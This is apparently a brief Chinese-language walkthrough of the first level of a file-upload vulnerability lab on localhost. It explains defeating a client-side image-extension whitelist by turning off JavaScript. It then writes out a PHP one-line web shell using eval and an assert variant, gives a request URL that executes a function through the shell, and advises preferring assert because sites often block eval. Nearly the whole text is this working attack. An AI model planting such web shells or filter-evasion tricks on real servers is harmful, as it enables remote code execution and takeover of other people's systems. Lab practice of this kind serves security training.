Pass-01
查看代码:源码定义白名单 .jpg.png.gif
VS中编写一句话木马web.php
<?php eval($_post['oupeng']); ?> 这个一句话木马会被系统pass掉
在设置中更改网站不允许使用js
上传web.php
用http://127.0.0.1/upload/web.php?0=assert&1=phpinfo()
0=assert传递函数 执行一句话木马 <?php assert($_post[1]); ?>
之所以不使用eval是因为这个函数很敏感,会被大多数的网站会屏蔽掉